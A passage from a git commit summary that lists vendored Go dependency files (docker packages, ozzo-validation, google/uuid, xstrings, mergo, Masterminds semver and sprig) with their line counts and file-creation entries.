 .../pkg/jsonmessage/jsonmessage_test.go       |  245 +
 .../docker/pkg/listeners/listeners_solaris.go |   31 +
 .../docker/pkg/listeners/listeners_unix.go    |   94 +
 .../docker/pkg/listeners/listeners_windows.go |   54 +
 .../docker/docker/pkg/locker/README.md        |   65 +
 .../docker/docker/pkg/locker/locker.go        |  112 +
 .../docker/docker/pkg/locker/locker_test.go   |  124 +
 .../docker/docker/pkg/longpath/longpath.go    |   26 +
 .../docker/pkg/longpath/longpath_test.go      |   22 +
 .../docker/pkg/loopback/attach_loopback.go    |  137 +
 .../docker/docker/pkg/loopback/ioctl.go       |   53 +
 .../docker/pkg/loopback/loop_wrapper.go       |   52 +
 .../docker/docker/pkg/loopback/loopback.go    |   63 +
 .../docker/docker/pkg/mount/flags.go          |  149 +
 .../docker/docker/pkg/mount/flags_freebsd.go  |   48 +
 .../docker/docker/pkg/mount/flags_linux.go    |   85 +
 .../docker/pkg/mount/flags_unsupported.go     |   30 +
 .../docker/docker/pkg/mount/mount.go          |   74 +
 .../docker/pkg/mount/mount_unix_test.go       |  162 +
 .../docker/pkg/mount/mounter_freebsd.go       |   59 +
 .../docker/docker/pkg/mount/mounter_linux.go  |   21 +
 .../docker/pkg/mount/mounter_solaris.go       |   33 +
 .../docker/pkg/mount/mounter_unsupported.go   |   11 +
 .../docker/docker/pkg/mount/mountinfo.go      |   40 +
 .../docker/pkg/mount/mountinfo_freebsd.go     |   41 +
 .../docker/pkg/mount/mountinfo_linux.go       |   95 +
 .../docker/pkg/mount/mountinfo_linux_test.go  |  476 +
 .../docker/pkg/mount/mountinfo_solaris.go     |   37 +
 .../docker/pkg/mount/mountinfo_unsupported.go |   12 +
 .../docker/pkg/mount/mountinfo_windows.go     |    6 +
 .../docker/pkg/mount/sharedsubtree_linux.go   |   69 +
 .../pkg/mount/sharedsubtree_linux_test.go     |  331 +
 .../docker/pkg/mount/sharedsubtree_solaris.go |   58 +
 .../cmd/names-generator/main.go               |   11 +
 .../pkg/namesgenerator/names-generator.go     |  590 ++
 .../namesgenerator/names-generator_test.go    |   27 +
 .../docker/pkg/parsers/kernel/kernel.go       |   74 +
 .../pkg/parsers/kernel/kernel_darwin.go       |   56 +
 .../docker/pkg/parsers/kernel/kernel_unix.go  |   45 +
 .../pkg/parsers/kernel/kernel_unix_test.go    |   96 +
 .../pkg/parsers/kernel/kernel_windows.go      |   69 +
 .../docker/pkg/parsers/kernel/uname_linux.go  |   19 +
 .../pkg/parsers/kernel/uname_solaris.go       |   14 +
 .../pkg/parsers/kernel/uname_unsupported.go   |   18 +
 .../operatingsystem/operatingsystem_linux.go  |   77 +
 .../operatingsystem_solaris.go                |   37 +
 .../operatingsystem/operatingsystem_unix.go   |   25 +
 .../operatingsystem_unix_test.go              |  247 +
 .../operatingsystem_windows.go                |   49 +
 .../docker/docker/pkg/parsers/parsers.go      |   69 +
 .../docker/docker/pkg/parsers/parsers_test.go |   70 +
 .../docker/docker/pkg/pidfile/pidfile.go      |   56 +
 .../docker/pkg/pidfile/pidfile_darwin.go      |   18 +
 .../docker/docker/pkg/pidfile/pidfile_test.go |   38 +
 .../docker/docker/pkg/pidfile/pidfile_unix.go |   16 +
 .../docker/pkg/pidfile/pidfile_windows.go     |   23 +
 .../docker/pkg/platform/architecture_linux.go |   16 +
 .../docker/pkg/platform/architecture_unix.go  |   20 +
 .../pkg/platform/architecture_windows.go      |   60 +
 .../docker/docker/pkg/platform/platform.go    |   23 +
 .../docker/pkg/platform/utsname_int8.go       |   18 +
 .../docker/pkg/platform/utsname_uint8.go      |   18 +
 .../docker/docker/pkg/plugingetter/getter.go  |   35 +
 .../docker/docker/pkg/plugins/client.go       |  205 +
 .../docker/docker/pkg/plugins/client_test.go  |  134 +
 .../docker/docker/pkg/plugins/discovery.go    |  131 +
 .../docker/pkg/plugins/discovery_test.go      |  152 +
 .../docker/pkg/plugins/discovery_unix.go      |    5 +
 .../docker/pkg/plugins/discovery_unix_test.go |   61 +
 .../docker/pkg/plugins/discovery_windows.go   |    8 +
 .../docker/docker/pkg/plugins/errors.go       |   33 +
 .../docker/docker/pkg/plugins/plugin_test.go  |   44 +
 .../pkg/plugins/pluginrpc-gen/README.md       |   58 +
 .../pkg/plugins/pluginrpc-gen/fixtures/foo.go |   89 +
 .../fixtures/otherfixture/spaceship.go        |    4 +
 .../docker/pkg/plugins/pluginrpc-gen/main.go  |   91 +
 .../pkg/plugins/pluginrpc-gen/parser.go       |  263 +
 .../pkg/plugins/pluginrpc-gen/parser_test.go  |  222 +
 .../pkg/plugins/pluginrpc-gen/template.go     |  118 +
 .../docker/docker/pkg/plugins/plugins.go      |  329 +
 .../docker/pkg/plugins/plugins_linux.go       |    7 +
 .../docker/pkg/plugins/plugins_windows.go     |    8 +
 .../docker/pkg/plugins/transport/http.go      |   36 +
 .../docker/pkg/plugins/transport/transport.go |   36 +
 .../docker/docker/pkg/pools/pools.go          |  116 +
 .../docker/docker/pkg/pools/pools_test.go     |  161 +
 .../docker/docker/pkg/progress/progress.go    |   84 +
 .../docker/pkg/progress/progressreader.go     |   66 +
 .../pkg/progress/progressreader_test.go       |   75 +
 .../docker/docker/pkg/promise/promise.go      |   11 +
 .../docker/docker/pkg/pubsub/publisher.go     |  111 +
 .../docker/pkg/pubsub/publisher_test.go       |  142 +
 .../docker/docker/pkg/random/random.go        |   71 +
 .../docker/docker/pkg/random/random_test.go   |   22 +
 .../docker/docker/pkg/reexec/README.md        |    5 +
 .../docker/docker/pkg/reexec/command_linux.go |   28 +
 .../docker/docker/pkg/reexec/command_unix.go  |   23 +
 .../docker/pkg/reexec/command_unsupported.go  |   12 +
 .../docker/pkg/reexec/command_windows.go      |   23 +
 .../docker/docker/pkg/reexec/reexec.go        |   47 +
 .../docker/docker/pkg/registrar/registrar.go  |  127 +
 .../docker/pkg/registrar/registrar_test.go    |  119 +
 .../docker/docker/pkg/signal/README.md        |    1 +
 .../docker/docker/pkg/signal/signal.go        |   54 +
 .../docker/docker/pkg/signal/signal_darwin.go |   41 +
 .../docker/pkg/signal/signal_freebsd.go       |   43 +
 .../docker/docker/pkg/signal/signal_linux.go  |   80 +
 .../docker/pkg/signal/signal_solaris.go       |   42 +
 .../docker/docker/pkg/signal/signal_unix.go   |   21 +
 .../docker/pkg/signal/signal_unsupported.go   |   10 +
 .../docker/pkg/signal/signal_windows.go       |   28 +
 .../docker/docker/pkg/signal/trap.go          |  103 +
 .../docker/docker/pkg/stdcopy/stdcopy.go      |  174 +
 .../docker/docker/pkg/stdcopy/stdcopy_test.go |  260 +
 .../pkg/streamformatter/streamformatter.go    |  172 +
 .../streamformatter/streamformatter_test.go   |  108 +
 .../docker/docker/pkg/stringid/README.md      |    1 +
 .../docker/docker/pkg/stringid/stringid.go    |   69 +
 .../docker/pkg/stringid/stringid_test.go      |   72 +
 .../docker/docker/pkg/stringutils/README.md   |    1 +
 .../docker/pkg/stringutils/stringutils.go     |  101 +
 .../pkg/stringutils/stringutils_test.go       |  121 +
 .../docker/docker/pkg/symlink/LICENSE.APACHE  |  191 +
 .../docker/docker/pkg/symlink/LICENSE.BSD     |   27 +
 .../docker/docker/pkg/symlink/README.md       |    6 +
 .../docker/docker/pkg/symlink/fs.go           |  144 +
 .../docker/docker/pkg/symlink/fs_unix.go      |   15 +
 .../docker/docker/pkg/symlink/fs_unix_test.go |  407 +
 .../docker/docker/pkg/symlink/fs_windows.go   |  169 +
 .../docker/docker/pkg/sysinfo/README.md       |    1 +
 .../docker/docker/pkg/sysinfo/numcpu.go       |   12 +
 .../docker/docker/pkg/sysinfo/numcpu_linux.go |   43 +
 .../docker/pkg/sysinfo/numcpu_windows.go      |   37 +
 .../docker/docker/pkg/sysinfo/sysinfo.go      |  144 +
 .../docker/pkg/sysinfo/sysinfo_linux.go       |  259 +
 .../docker/pkg/sysinfo/sysinfo_linux_test.go  |   58 +
 .../docker/pkg/sysinfo/sysinfo_solaris.go     |  121 +
 .../docker/docker/pkg/sysinfo/sysinfo_test.go |   26 +
 .../docker/docker/pkg/sysinfo/sysinfo_unix.go |    9 +
 .../docker/pkg/sysinfo/sysinfo_windows.go     |    9 +
 .../docker/docker/pkg/system/chtimes.go       |   52 +
 .../docker/docker/pkg/system/chtimes_test.go  |   94 +
 .../docker/docker/pkg/system/chtimes_unix.go  |   14 +
 .../docker/pkg/system/chtimes_unix_test.go    |   91 +
 .../docker/pkg/system/chtimes_windows.go      |   27 +
 .../docker/pkg/system/chtimes_windows_test.go |   86 +
 .../docker/docker/pkg/system/errors.go        |   10 +
 .../docker/pkg/system/events_windows.go       |   85 +
 .../docker/docker/pkg/system/exitcode.go      |   33 +
 .../docker/docker/pkg/system/filesys.go       |   54 +
 .../docker/pkg/system/filesys_windows.go      |  236 +
 .../docker/docker/pkg/system/lstat.go         |   19 +
 .../docker/pkg/system/lstat_unix_test.go      |   30 +
 .../docker/docker/pkg/system/lstat_windows.go |   25 +
 .../docker/docker/pkg/system/meminfo.go       |   17 +
 .../docker/docker/pkg/system/meminfo_linux.go |   65 +
 .../docker/pkg/system/meminfo_solaris.go      |  128 +
 .../docker/pkg/system/meminfo_unix_test.go    |   40 +
 .../docker/pkg/system/meminfo_unsupported.go  |    8 +
 .../docker/pkg/system/meminfo_windows.go      |   45 +
 .../docker/docker/pkg/system/mknod.go         |   22 +
 .../docker/docker/pkg/system/mknod_windows.go |   13 +
 .../docker/docker/pkg/system/path_unix.go     |   14 +
 .../docker/docker/pkg/system/path_windows.go  |   37 +
 .../docker/pkg/system/path_windows_test.go    |   78 +
 .../docker/docker/pkg/system/stat.go          |   53 +
 .../docker/docker/pkg/system/stat_darwin.go   |   32 +
 .../docker/docker/pkg/system/stat_freebsd.go  |   27 +
 .../docker/docker/pkg/system/stat_linux.go    |   33 +
 .../docker/docker/pkg/system/stat_openbsd.go  |   15 +
 .../docker/docker/pkg/system/stat_solaris.go  |   34 +
 .../docker/pkg/system/stat_unix_test.go       |   39 +
 .../docker/pkg/system/stat_unsupported.go     |   17 +
 .../docker/docker/pkg/system/stat_windows.go  |   43 +
 .../docker/docker/pkg/system/syscall_unix.go  |   17 +
 .../docker/pkg/system/syscall_windows.go      |  105 +
 .../docker/pkg/system/syscall_windows_test.go |    9 +
 .../docker/docker/pkg/system/umask.go         |   13 +
 .../docker/docker/pkg/system/umask_windows.go |    9 +
 .../docker/pkg/system/utimes_freebsd.go       |   22 +
 .../docker/docker/pkg/system/utimes_linux.go  |   26 +
 .../docker/pkg/system/utimes_unix_test.go     |   68 +
 .../docker/pkg/system/utimes_unsupported.go   |   10 +
 .../docker/docker/pkg/system/xattrs_linux.go  |   63 +
 .../docker/pkg/system/xattrs_unsupported.go   |   13 +
 .../docker/docker/pkg/tailfile/tailfile.go    |   66 +
 .../docker/pkg/tailfile/tailfile_test.go      |  148 +
 .../docker/pkg/tarsum/builder_context.go      |   21 +
 .../docker/pkg/tarsum/builder_context_test.go |   67 +
 .../docker/docker/pkg/tarsum/fileinfosums.go  |  126 +
 .../docker/pkg/tarsum/fileinfosums_test.go    |   62 +
 .../docker/docker/pkg/tarsum/tarsum.go        |  295 +
 .../docker/docker/pkg/tarsum/tarsum_spec.md   |  230 +
 .../docker/docker/pkg/tarsum/tarsum_test.go   |  664 ++
 .../json                                      |    1 +
 .../layer.tar                                 |  Bin 0 -> 9216 bytes
 .../json                                      |    1 +
 .../layer.tar                                 |  Bin 0 -> 1536 bytes
 .../tarsum/testdata/collision/collision-0.tar |  Bin 0 -> 10240 bytes
 .../tarsum/testdata/collision/collision-1.tar |  Bin 0 -> 10240 bytes
 .../tarsum/testdata/collision/collision-2.tar |  Bin 0 -> 10240 bytes
 .../tarsum/testdata/collision/collision-3.tar |  Bin 0 -> 10240 bytes
 .../docker/pkg/tarsum/testdata/xattr/json     |    1 +
 .../pkg/tarsum/testdata/xattr/layer.tar       |  Bin 0 -> 2560 bytes
 .../docker/docker/pkg/tarsum/versioning.go    |  150 +
 .../docker/pkg/tarsum/versioning_test.go      |   98 +
 .../docker/docker/pkg/tarsum/writercloser.go  |   22 +
 .../docker/docker/pkg/term/ascii.go           |   66 +
 .../docker/docker/pkg/term/ascii_test.go      |   43 +
 .../docker/docker/pkg/term/tc_linux_cgo.go    |   50 +
 .../docker/docker/pkg/term/tc_other.go        |   20 +
 .../docker/docker/pkg/term/tc_solaris_cgo.go  |   63 +
 .../github.com/docker/docker/pkg/term/term.go |  123 +
 .../docker/docker/pkg/term/term_solaris.go    |   41 +
 .../docker/docker/pkg/term/term_unix.go       |   29 +
 .../docker/docker/pkg/term/term_windows.go    |  233 +
 .../docker/docker/pkg/term/termios_darwin.go  |   69 +
 .../docker/docker/pkg/term/termios_freebsd.go |   69 +
 .../docker/docker/pkg/term/termios_linux.go   |   47 +
 .../docker/docker/pkg/term/termios_openbsd.go |   69 +
 .../docker/pkg/term/windows/ansi_reader.go    |  263 +
 .../docker/pkg/term/windows/ansi_writer.go    |   64 +
 .../docker/docker/pkg/term/windows/console.go |   35 +
 .../docker/docker/pkg/term/windows/windows.go |   33 +
 .../docker/pkg/term/windows/windows_test.go   |    3 +
 .../docker/pkg/testutil/assert/assert.go      |   97 +
 .../docker/docker/pkg/testutil/pkg.go         |    1 +
 .../docker/pkg/testutil/tempfile/tempfile.go  |   36 +
 .../docker/pkg/tlsconfig/tlsconfig_clone.go   |   11 +
 .../pkg/tlsconfig/tlsconfig_clone_go16.go     |   31 +
 .../pkg/tlsconfig/tlsconfig_clone_go17.go     |   33 +
 .../docker/pkg/truncindex/truncindex.go       |  137 +
 .../docker/pkg/truncindex/truncindex_test.go  |  429 +
 .../docker/docker/pkg/urlutil/urlutil.go      |   50 +
 .../docker/docker/pkg/urlutil/urlutil_test.go |   70 +
 .../docker/docker/pkg/useragent/README.md     |    1 +
 .../docker/docker/pkg/useragent/useragent.go  |   55 +
 .../docker/pkg/useragent/useragent_test.go    |   31 +
 .../docker/docker/plugin/backend_linux.go     |  790 ++
 .../docker/plugin/backend_unsupported.go      |   71 +
 .../docker/docker/plugin/blobstore.go         |  181 +
 .../github.com/docker/docker/plugin/defs.go   |   26 +
 .../docker/docker/plugin/manager.go           |  347 +
 .../docker/docker/plugin/manager_linux.go     |  284 +
 .../docker/docker/plugin/manager_solaris.go   |   28 +
 .../docker/docker/plugin/manager_windows.go   |   30 +
 .../github.com/docker/docker/plugin/store.go  |  263 +
 .../docker/docker/plugin/store_test.go        |   33 +
 .../docker/docker/plugin/v2/plugin.go         |  244 +
 .../docker/docker/plugin/v2/plugin_linux.go   |  121 +
 .../docker/plugin/v2/plugin_unsupported.go    |   14 +
 .../docker/docker/plugin/v2/settable.go       |  102 +
 .../docker/docker/plugin/v2/settable_test.go  |   91 +
 vendor/github.com/docker/docker/poule.yml     |   88 +
 .../docker/profiles/apparmor/apparmor.go      |  122 +
 .../docker/profiles/apparmor/template.go      |   46 +
 .../docker/profiles/seccomp/default.json      |  698 ++
 .../profiles/seccomp/fixtures/example.json    |   27 +
 .../docker/profiles/seccomp/generate.go       |   32 +
 .../docker/docker/profiles/seccomp/seccomp.go |  150 +
 .../profiles/seccomp/seccomp_default.go       |  604 ++
 .../docker/profiles/seccomp/seccomp_test.go   |   32 +
 .../profiles/seccomp/seccomp_unsupported.go   |   13 +
 .../github.com/docker/docker/project/ARM.md   |   45 +
 .../docker/project/BRANCHES-AND-TAGS.md       |   35 +
 .../docker/docker/project/CONTRIBUTORS.md     |    1 +
 .../docker/docker/project/GOVERNANCE.md       |   17 +
 .../docker/project/IRC-ADMINISTRATION.md      |   37 +
 .../docker/docker/project/ISSUE-TRIAGE.md     |  132 +
 .../project/PACKAGE-REPO-MAINTENANCE.md       |   74 +
 .../docker/docker/project/PACKAGERS.md        |  307 +
 .../docker/docker/project/PATCH-RELEASES.md   |   68 +
 .../docker/docker/project/PRINCIPLES.md       |   19 +
 .../docker/docker/project/README.md           |   24 +
 .../docker/project/RELEASE-CHECKLIST.md       |  518 ++
 .../docker/docker/project/RELEASE-PROCESS.md  |   78 +
 .../docker/docker/project/REVIEWING.md        |  246 +
 .../github.com/docker/docker/project/TOOLS.md |   63 +
 .../docker/docker/reference/reference.go      |  216 +
 .../docker/docker/reference/reference_test.go |  275 +
 .../docker/docker/reference/store.go          |  286 +
 .../docker/docker/reference/store_test.go     |  356 +
 .../github.com/docker/docker/registry/auth.go |  303 +
 .../docker/docker/registry/auth_test.go       |  124 +
 .../docker/docker/registry/config.go          |  305 +
 .../docker/docker/registry/config_test.go     |   49 +
 .../docker/docker/registry/config_unix.go     |   25 +
 .../docker/docker/registry/config_windows.go  |   25 +
 .../docker/docker/registry/endpoint_test.go   |   78 +
 .../docker/docker/registry/endpoint_v1.go     |  198 +
 .../docker/docker/registry/registry.go        |  191 +
 .../docker/registry/registry_mock_test.go     |  478 +
 .../docker/docker/registry/registry_test.go   |  875 ++
 .../docker/docker/registry/service.go         |  304 +
 .../docker/docker/registry/service_v1.go      |   40 +
 .../docker/docker/registry/service_v1_test.go |   23 +
 .../docker/docker/registry/service_v2.go      |   78 +
 .../docker/docker/registry/session.go         |  783 ++
 .../docker/docker/registry/types.go           |   73 +
 .../docker/restartmanager/restartmanager.go   |  128 +
 .../restartmanager/restartmanager_test.go     |   34 +
 .../docker/docker/runconfig/compare.go        |   61 +
 .../docker/docker/runconfig/compare_test.go   |  126 +
 .../docker/docker/runconfig/config.go         |   97 +
 .../docker/docker/runconfig/config_test.go    |  139 +
 .../docker/docker/runconfig/config_unix.go    |   59 +
 .../docker/docker/runconfig/config_windows.go |   19 +
 .../docker/docker/runconfig/errors.go         |   46 +
 .../fixtures/unix/container_config_1_14.json  |   30 +
 .../fixtures/unix/container_config_1_17.json  |   50 +
 .../fixtures/unix/container_config_1_19.json  |   58 +
 .../unix/container_hostconfig_1_14.json       |   18 +
 .../unix/container_hostconfig_1_19.json       |   30 +
 .../windows/container_config_1_19.json        |   58 +
 .../docker/docker/runconfig/hostconfig.go     |   35 +
 .../docker/runconfig/hostconfig_solaris.go    |   41 +
 .../docker/runconfig/hostconfig_test.go       |  283 +
 .../docker/runconfig/hostconfig_unix.go       |  129 +
 .../docker/runconfig/hostconfig_windows.go    |   68 +
 .../docker/docker/runconfig/opts/envfile.go   |   81 +
 .../docker/runconfig/opts/envfile_test.go     |  142 +
 .../docker/runconfig/opts/fixtures/utf16.env  |  Bin 0 -> 54 bytes
 .../runconfig/opts/fixtures/utf16be.env       |  Bin 0 -> 54 bytes
 .../docker/runconfig/opts/fixtures/utf8.env   |    3 +
 .../docker/runconfig/opts/fixtures/valid.env  |    1 +
 .../runconfig/opts/fixtures/valid.label       |    1 +
 .../docker/docker/runconfig/opts/opts.go      |   83 +
 .../docker/docker/runconfig/opts/opts_test.go |  113 +
 .../docker/docker/runconfig/opts/parse.go     |  995 +++
 .../docker/runconfig/opts/parse_test.go       |  894 ++
 .../docker/docker/runconfig/opts/runtime.go   |   79 +
 .../docker/runconfig/opts/throttledevice.go   |  111 +
 .../docker/docker/runconfig/opts/ulimit.go    |   57 +
 .../docker/runconfig/opts/ulimit_test.go      |   42 +
 .../docker/runconfig/opts/weightdevice.go     |   89 +
 .../github.com/docker/docker/utils/debug.go   |   26 +
 .../docker/docker/utils/debug_test.go         |   43 +
 .../github.com/docker/docker/utils/names.go   |    9 +
 .../docker/docker/utils/process_unix.go       |   22 +
 .../docker/docker/utils/process_windows.go    |   20 +
 .../docker/utils/templates/templates.go       |   42 +
 .../docker/utils/templates/templates_test.go  |   38 +
 .../github.com/docker/docker/utils/utils.go   |   87 +
 .../docker/docker/utils/utils_test.go         |   21 +
 vendor/github.com/docker/docker/vendor.conf   |  140 +
 .../docker/docker/volume/drivers/adapter.go   |  177 +
 .../docker/docker/volume/drivers/extpoint.go  |  215 +
 .../docker/volume/drivers/extpoint_test.go    |   23 +
 .../docker/docker/volume/drivers/proxy.go     |  242 +
 .../docker/volume/drivers/proxy_test.go       |  132 +
 .../docker/docker/volume/local/local.go       |  364 +
 .../docker/docker/volume/local/local_test.go  |  344 +
 .../docker/docker/volume/local/local_unix.go  |   87 +
 .../docker/volume/local/local_windows.go      |   34 +
 .../docker/docker/volume/store/db.go          |   88 +
 .../docker/docker/volume/store/errors.go      |   76 +
 .../docker/docker/volume/store/restore.go     |   83 +
 .../docker/docker/volume/store/store.go       |  649 ++
 .../docker/docker/volume/store/store_test.go  |  234 +
 .../docker/docker/volume/store/store_unix.go  |    9 +
 .../docker/volume/store/store_windows.go      |   12 +
 .../docker/volume/testutils/testutils.go      |  116 +
 .../docker/docker/volume/validate.go          |  125 +
 .../docker/docker/volume/validate_test.go     |   43 +
 .../docker/volume/validate_test_unix.go       |    8 +
 .../docker/volume/validate_test_windows.go    |    6 +
 .../github.com/docker/docker/volume/volume.go |  323 +
 .../docker/docker/volume/volume_copy.go       |   23 +
 .../docker/docker/volume/volume_copy_unix.go  |    8 +
 .../docker/volume/volume_copy_windows.go      |    6 +
 .../docker/docker/volume/volume_linux.go      |   56 +
 .../docker/docker/volume/volume_linux_test.go |   51 +
 .../docker/volume/volume_propagation_linux.go |   47 +
 .../volume/volume_propagation_linux_test.go   |   65 +
 .../volume/volume_propagation_unsupported.go  |   24 +
 .../docker/docker/volume/volume_test.go       |  269 +
 .../docker/docker/volume/volume_unix.go       |  138 +
 .../docker/volume/volume_unsupported.go       |   16 +
 .../docker/docker/volume/volume_windows.go    |  201 +
 .../go-ozzo/ozzo-validation/.gitignore        |   24 +
 .../go-ozzo/ozzo-validation/.travis.yml       |   16 +
 .../go-ozzo/ozzo-validation/LICENSE           |   17 +
 .../go-ozzo/ozzo-validation/README.md         |  530 ++
 .../go-ozzo/ozzo-validation/UPGRADE.md        |   46 +
 .../go-ozzo/ozzo-validation/date.go           |   84 +
 .../go-ozzo/ozzo-validation/date_test.go      |   69 +
 .../go-ozzo/ozzo-validation/error.go          |   89 +
 .../go-ozzo/ozzo-validation/error_test.go     |   70 +
 .../go-ozzo/ozzo-validation/example_test.go   |  130 +
 .../github.com/go-ozzo/ozzo-validation/in.go  |   43 +
 .../go-ozzo/ozzo-validation/in_test.go        |   44 +
 .../go-ozzo/ozzo-validation/is/rules.go       |  138 +
 .../go-ozzo/ozzo-validation/is/rules_test.go  |   94 +
 .../go-ozzo/ozzo-validation/length.go         |   77 +
 .../go-ozzo/ozzo-validation/length_test.go    |   90 +
 .../go-ozzo/ozzo-validation/match.go          |   47 +
 .../go-ozzo/ozzo-validation/match_test.go     |   44 +
 .../go-ozzo/ozzo-validation/minmax.go         |  177 +
 .../go-ozzo/ozzo-validation/minmax_test.go    |  137 +
 .../go-ozzo/ozzo-validation/not_nil.go        |   32 +
 .../go-ozzo/ozzo-validation/not_nil_test.go   |   50 +
 .../go-ozzo/ozzo-validation/required.go       |   42 +
 .../go-ozzo/ozzo-validation/required_test.go  |   75 +
 .../go-ozzo/ozzo-validation/string.go         |   48 +
 .../go-ozzo/ozzo-validation/string_test.go    |  106 +
 .../go-ozzo/ozzo-validation/struct.go         |  154 +
 .../go-ozzo/ozzo-validation/struct_test.go    |  137 +
 .../go-ozzo/ozzo-validation/util.go           |  157 +
 .../go-ozzo/ozzo-validation/util_test.go      |  293 +
 .../go-ozzo/ozzo-validation/validation.go     |  133 +
 .../ozzo-validation/validation_test.go        |  145 +
 vendor/github.com/google/uuid/.travis.yml     |    9 +
 vendor/github.com/google/uuid/CONTRIBUTING.md |   10 +
 vendor/github.com/google/uuid/CONTRIBUTORS    |    9 +
 vendor/github.com/google/uuid/LICENSE         |   27 +
 vendor/github.com/google/uuid/README.md       |   23 +
 vendor/github.com/google/uuid/dce.go          |   80 +
 vendor/github.com/google/uuid/doc.go          |   12 +
 vendor/github.com/google/uuid/hash.go         |   53 +
 vendor/github.com/google/uuid/json_test.go    |   62 +
 vendor/github.com/google/uuid/marshal.go      |   39 +
 vendor/github.com/google/uuid/node.go         |  103 +
 vendor/github.com/google/uuid/seq_test.go     |   66 +
 vendor/github.com/google/uuid/sql.go          |   58 +
 vendor/github.com/google/uuid/sql_test.go     |  102 +
 vendor/github.com/google/uuid/time.go         |  123 +
 vendor/github.com/google/uuid/util.go         |   43 +
 vendor/github.com/google/uuid/uuid.go         |  191 +
 vendor/github.com/google/uuid/uuid_test.go    |  526 ++
 vendor/github.com/google/uuid/version1.go     |   44 +
 vendor/github.com/google/uuid/version4.go     |   38 +
 vendor/github.com/huandu/xstrings/.gitignore  |   24 +
 vendor/github.com/huandu/xstrings/.travis.yml |    1 +
 .../huandu/xstrings/CONTRIBUTING.md           |   23 +
 vendor/github.com/huandu/xstrings/LICENSE     |   22 +
 vendor/github.com/huandu/xstrings/README.md   |  114 +
 vendor/github.com/huandu/xstrings/common.go   |   25 +
 vendor/github.com/huandu/xstrings/convert.go  |  364 +
 .../huandu/xstrings/convert_test.go           |  165 +
 vendor/github.com/huandu/xstrings/count.go    |  120 +
 .../github.com/huandu/xstrings/count_test.go  |   62 +
 vendor/github.com/huandu/xstrings/doc.go      |    8 +
 vendor/github.com/huandu/xstrings/format.go   |  170 +
 .../github.com/huandu/xstrings/format_test.go |  100 +
 .../github.com/huandu/xstrings/manipulate.go  |  217 +
 .../huandu/xstrings/manipulate_test.go        |  142 +
 .../github.com/huandu/xstrings/translate.go   |  547 ++
 .../huandu/xstrings/translate_test.go         |   96 +
 .../github.com/huandu/xstrings/util_test.go   |   33 +
 vendor/github.com/imdario/mergo/.gitignore    |   33 +
 vendor/github.com/imdario/mergo/.travis.yml   |    7 +
 .../imdario/mergo/CODE_OF_CONDUCT.md          |   46 +
 vendor/github.com/imdario/mergo/LICENSE       |   28 +
 vendor/github.com/imdario/mergo/README.md     |  222 +
 vendor/github.com/imdario/mergo/doc.go        |   44 +
 .../github.com/imdario/mergo/issue17_test.go  |   25 +
 .../github.com/imdario/mergo/issue23_test.go  |   27 +
 .../github.com/imdario/mergo/issue33_test.go  |   33 +
 .../github.com/imdario/mergo/issue38_test.go  |   59 +
 .../github.com/imdario/mergo/issue50_test.go  |   18 +
 .../github.com/imdario/mergo/issue52_test.go  |   99 +
 .../github.com/imdario/mergo/issue61_test.go  |   20 +
 .../github.com/imdario/mergo/issue64_test.go  |   38 +
 .../github.com/imdario/mergo/issue66_test.go  |   48 +
 vendor/github.com/imdario/mergo/map.go        |  174 +
 vendor/github.com/imdario/mergo/merge.go      |  245 +
 .../imdario/mergo/merge_appendslice_test.go   |   33 +
 vendor/github.com/imdario/mergo/merge_test.go |   50 +
 vendor/github.com/imdario/mergo/mergo.go      |   97 +
 vendor/github.com/imdario/mergo/mergo_test.go |  733 ++
 vendor/github.com/imdario/mergo/pr80_test.go  |   18 +
 vendor/github.com/imdario/mergo/pr81_test.go  |   42 +
 .../imdario/mergo/testdata/license.yml        |    4 +
 .../imdario/mergo/testdata/thing.yml          |    6 +
 2471 files changed, 356877 insertions(+), 2 deletions(-)
 create mode 100644 vendor/github.com/Masterminds/semver/.travis.yml
 create mode 100644 vendor/github.com/Masterminds/semver/CHANGELOG.md
 create mode 100644 vendor/github.com/Masterminds/semver/LICENSE.txt
 create mode 100644 vendor/github.com/Masterminds/semver/Makefile
 create mode 100644 vendor/github.com/Masterminds/semver/README.md
 create mode 100644 vendor/github.com/Masterminds/semver/appveyor.yml
 create mode 100644 vendor/github.com/Masterminds/semver/benchmark_test.go
 create mode 100644 vendor/github.com/Masterminds/semver/collection.go
 create mode 100644 vendor/github.com/Masterminds/semver/collection_test.go
 create mode 100644 vendor/github.com/Masterminds/semver/constraints.go
 create mode 100644 vendor/github.com/Masterminds/semver/constraints_test.go
 create mode 100644 vendor/github.com/Masterminds/semver/doc.go
 create mode 100644 vendor/github.com/Masterminds/semver/version.go
 create mode 100644 vendor/github.com/Masterminds/semver/version_test.go
 create mode 100644 vendor/github.com/Masterminds/sprig/.gitignore
 create mode 100644 vendor/github.com/Masterminds/sprig/.travis.yml
 create mode 100644 vendor/github.com/Masterminds/sprig/CHANGELOG.md
 create mode 100644 vendor/github.com/Masterminds/sprig/LICENSE.txt
 create mode 100644 vendor/github.com/Masterminds/sprig/Makefile
 create mode 100644 vendor/github.com/Masterminds/sprig/README.md
 create mode 100644 vendor/github.com/Masterminds/sprig/appveyor.yml
 create mode 100644 vendor/github.com/Masterminds/sprig/crypto.go
 create mode 100644 vendor/github.com/Masterminds/sprig/crypto_test.go
 create mode 100644 vendor/github.com/Masterminds/sprig/date.go
 create mode 100644 vendor/github.com/Masterminds/sprig/date_test.go
 create mode 100644 vendor/github.com/Masterminds/sprig/defaults.go
 create mode 100644 vendor/github.com/Masterminds/sprig/defaults_test.go
 create mode 100644 vendor/github.com/Masterminds/sprig/dict.go
 create mode 100644 vendor/github.com/Masterminds/sprig/dict_test.go
 create mode 100644 vendor/github.com/Masterminds/sprig/doc.go
 create mode 100644 vendor/github.com/Masterminds/sprig/docs/_config.yml
 create mode 100644 vendor/github.com/Masterminds/sprig/docs/conversion.md
 create mode 100644 vendor/github.com/Masterminds/sprig/docs/crypto.md
 create mode 100644 vendor/github.com/Masterminds/sprig/docs/date.md
 create mode 100644 vendor/github.com/Masterminds/sprig/docs/defaults.md
 create mode 100644 vendor/github.com/Masterminds/sprig/docs/dicts.md
 create mode 100644 vendor/github.com/Masterminds/sprig/docs/encoding.md
 create mode 100644 vendor/github.com/Masterminds/sprig/docs/flow_control.md
 create mode 100644 vendor/github.com/Masterminds/sprig/docs/index.md
 create mode 100644 vendor/github.com/Masterminds/sprig/docs/integer_slice.md
 create mode 100644 vendor/github.com/Masterminds/sprig/docs/lists.md
 create mode 100644 vendor/github.com/Masterminds/sprig/docs/math.md
 create mode 100644 vendor/github.com/Masterminds/sprig/docs/os.md
 create mode 100644 vendor/github.com/Masterminds/sprig/docs/paths.md
